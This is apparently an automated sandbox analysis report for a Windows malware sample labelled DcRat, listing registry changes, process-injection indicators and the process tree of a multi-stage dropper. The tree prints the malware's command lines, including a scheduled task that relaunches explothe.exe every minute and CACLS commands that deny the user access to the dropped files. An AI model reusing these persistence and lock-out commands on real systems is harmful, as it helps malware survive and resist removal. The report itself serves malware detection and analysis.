Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

3Sg93wL.exeAppLaunch.exeExplorer.EXE

pid	process
2772	3Sg93wL.exe
2772	3Sg93wL.exe
4676	AppLaunch.exe
4676	AppLaunch.exe
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3252 Explorer.EXE
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

3Sg93wL.exetoolspub2.exe

pid process

2772 3Sg93wL.exe
5784 toolspub2.exe

pid	process
3252	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AppLaunch.exeExplorer.EXEAUDIODG.EXEkos4.exe

description	pid	process
Token: SeDebugPrivilege	4676	AppLaunch.exe
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: 33	7540	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	7540	AUDIODG.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeDebugPrivilege	5092	kos4.exe
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE

Suspicious use of FindShellTrayWindow 53 IoCs

Processes:

msedge.exe40F4.exemsedge.exeExplorer.EXE

pid	process
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
1224	40F4.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
3252	Explorer.EXE
3252	Explorer.EXE

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe
8296	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Broom.exe

pid process

7544 Broom.exe

pid	process
7544	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exeXa7sA84.exeIU3rW06.exeOZ5YJ48.exeAh1bM17.exebz4yx42.exe1rV67Gq5.exe2qw6973.exe4io760Sn.exe

description	pid	process	target process
PID 544 wrote to memory of 336	544	NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exe	Xa7sA84.exe
PID 544 wrote to memory of 336	544	NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exe	Xa7sA84.exe
PID 544 wrote to memory of 336	544	NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exe	Xa7sA84.exe
PID 336 wrote to memory of 2324	336	Xa7sA84.exe	IU3rW06.exe
PID 336 wrote to memory of 2324	336	Xa7sA84.exe	IU3rW06.exe
PID 336 wrote to memory of 2324	336	Xa7sA84.exe	IU3rW06.exe
PID 2324 wrote to memory of 4920	2324	IU3rW06.exe	OZ5YJ48.exe
PID 2324 wrote to memory of 4920	2324	IU3rW06.exe	OZ5YJ48.exe
PID 2324 wrote to memory of 4920	2324	IU3rW06.exe	OZ5YJ48.exe
PID 4920 wrote to memory of 4592	4920	OZ5YJ48.exe	Ah1bM17.exe
PID 4920 wrote to memory of 4592	4920	OZ5YJ48.exe	Ah1bM17.exe
PID 4920 wrote to memory of 4592	4920	OZ5YJ48.exe	Ah1bM17.exe
PID 4592 wrote to memory of 1308	4592	Ah1bM17.exe	bz4yx42.exe
PID 4592 wrote to memory of 1308	4592	Ah1bM17.exe	bz4yx42.exe
PID 4592 wrote to memory of 1308	4592	Ah1bM17.exe	bz4yx42.exe
PID 1308 wrote to memory of 4272	1308	bz4yx42.exe	1rV67Gq5.exe
PID 1308 wrote to memory of 4272	1308	bz4yx42.exe	1rV67Gq5.exe
PID 1308 wrote to memory of 4272	1308	bz4yx42.exe	1rV67Gq5.exe
PID 4272 wrote to memory of 4568	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4568	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4568	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 3988	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 3988	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 3988	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4272 wrote to memory of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 1308 wrote to memory of 4804	1308	bz4yx42.exe	2qw6973.exe
PID 1308 wrote to memory of 4804	1308	bz4yx42.exe	2qw6973.exe
PID 1308 wrote to memory of 4804	1308	bz4yx42.exe	2qw6973.exe
PID 4804 wrote to memory of 4732	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 4732	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 4732	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4804 wrote to memory of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4592 wrote to memory of 2772	4592	Ah1bM17.exe	3Sg93wL.exe
PID 4592 wrote to memory of 2772	4592	Ah1bM17.exe	3Sg93wL.exe
PID 4592 wrote to memory of 2772	4592	Ah1bM17.exe	3Sg93wL.exe
PID 4920 wrote to memory of 4696	4920	OZ5YJ48.exe	4io760Sn.exe
PID 4920 wrote to memory of 4696	4920	OZ5YJ48.exe	4io760Sn.exe
PID 4920 wrote to memory of 4696	4920	OZ5YJ48.exe	4io760Sn.exe
PID 4696 wrote to memory of 1912	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 1912	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 1912	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 236	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 236	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 236	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 236	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 236	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 236	4696	4io760Sn.exe	AppLaunch.exe
PID 4696 wrote to memory of 236	4696	4io760Sn.exe	AppLaunch.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3252

C:\Users\Admin\AppData\Local\Temp\NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exe"
2⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:544

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Xa7sA84.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Xa7sA84.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:336

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IU3rW06.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IU3rW06.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2324

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\OZ5YJ48.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\OZ5YJ48.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4920

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ah1bM17.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ah1bM17.exe
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4592

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\bz4yx42.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\bz4yx42.exe
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1308

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1rV67Gq5.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1rV67Gq5.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
PID:4568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
PID:3988

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2qw6973.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2qw6973.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
PID:4732

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
PID:3100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3100 -s 540
10⤵
- Program crash
PID:3332

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Sg93wL.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Sg93wL.exe
7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2772

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4io760Sn.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4io760Sn.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:1912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5ae7db3.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5ae7db3.exe
5⤵
- Checks computer location settings
- Executes dropped EXE
PID:3452

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
PID:2216

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
7⤵
- DcRat
- Creates scheduled task(s)
PID:1292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
7⤵
PID:3096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
8⤵
PID:492

C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
8⤵
PID:4416

C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
8⤵
PID:4356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
8⤵
PID:3360

C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
8⤵
PID:1468

C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
8⤵
PID:1844

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
7⤵
- Loads dropped DLL
PID:8808

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6ga3oR2.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6ga3oR2.exe
4⤵
- Executes dropped EXE
PID:472

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7PX9DF05.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7PX9DF05.exe
3⤵
- Executes dropped EXE
PID:5068

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AAE6.tmp\AAE7.tmp\AAE8.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7PX9DF05.exe"
4⤵
PID:4044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
5⤵
PID:1112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x80,0x174,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
6⤵
PID:4716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,12339638870778142133,9237260555541742693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
6⤵
PID:4272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
